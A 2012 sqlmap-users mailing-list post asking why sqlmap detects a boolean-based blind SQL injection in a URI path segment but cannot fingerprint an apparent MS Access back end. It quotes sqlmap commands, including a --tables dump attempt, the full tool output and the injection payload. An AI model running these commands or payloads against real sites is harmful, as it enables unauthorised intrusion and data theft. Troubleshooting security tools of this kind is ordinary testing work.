[sqlmap-users] Could not detect MS database injection
From: Volker N. <vol...@rw...> - 2012-12-15 16:09:52
Hi,

I am using sqlmap to scan a specific GET parameter of a target site. I know there is a SQL injection in parameter 2:

python sqlmap.py -u "http://example.net/de/de*/site" --batch

sqlmap gives me the following result:

> …
> [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be injectable (possible DBMS: Microsoft Access)
> [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
> [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [16:36:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
> [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
> [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:37:11] [INFO] testing Microsoft Access
> [16:37:13] [INFO] confirming Microsoft Access
> [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> [16:37:14] [INFO] testing MySQL
> [16:37:16] [WARNING] the back-end DBMS is not MySQL
> [16:37:16] [INFO] testing Oracle
> [16:37:17] [WARNING] the back-end DBMS is not Oracle
> [16:37:17] [INFO] testing PostgreSQL
> [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> [16:37:18] [INFO] testing Microsoft SQL Server
> [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:37:19] [INFO] testing SQLite
> [16:37:20] [WARNING] the back-end DBMS is not SQLite
> [16:37:20] [INFO] testing Firebird
> [16:37:21] [WARNING] the back-end DBMS is not Firebird
> [16:37:21] [INFO] testing SAP MaxDB
> [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:37:22] [INFO] testing Sybase
> [16:37:23] [WARNING] the back-end DBMS is not Sybase
> [16:37:23] [INFO] testing IBM DB2
> [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> [16:37:24] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
>
> [*] shutting down at 16:37:24

I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or not? When I manually try the following URL in my browser, "http://example.net/de/de'/site", I get a 500 HTML page with the output "Microsoft JET Database Engine Error …", so I would say the DBMS is MS Access.

When I now try to get, for example, all tables, the following happens:

> python sqlmap.py -u "example.net/de/de*/site" --batch --tables
>
> sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 16:38:02
>
> [16:38:05] [INFO] custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
> [16:38:05] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:38:07] [INFO] testing MySQL
> [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> [16:38:08] [WARNING] the back-end DBMS is not MySQL
> [16:38:08] [INFO] testing Oracle
> [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> [16:38:09] [WARNING] the back-end DBMS is not Oracle
> [16:38:09] [INFO] testing PostgreSQL
> [16:38:10] [WARNING] reflective value(s) found and filtering out
> [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> [16:38:10] [INFO] testing Microsoft SQL Server
> [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:38:11] [INFO] testing SQLite
> [16:38:12] [WARNING] the back-end DBMS is not SQLite
> [16:38:12] [INFO] testing Microsoft Access
> [16:38:12] [INFO] confirming Microsoft Access
> [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> [16:38:13] [INFO] testing Firebird
> [16:38:14] [WARNING] the back-end DBMS is not Firebird
> [16:38:14] [INFO] testing SAP MaxDB
> [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:38:15] [INFO] testing Sybase
> [16:38:16] [WARNING] the back-end DBMS is not Sybase
> [16:38:16] [INFO] testing IBM DB2
> [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
> [16:38:17] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
>
> [*] shutting down at 16:38:17

Even when I try to use the --text-only or --not-string switches, I am not able to receive the tables.

Any ideas?

Best regards
Volker Nebelung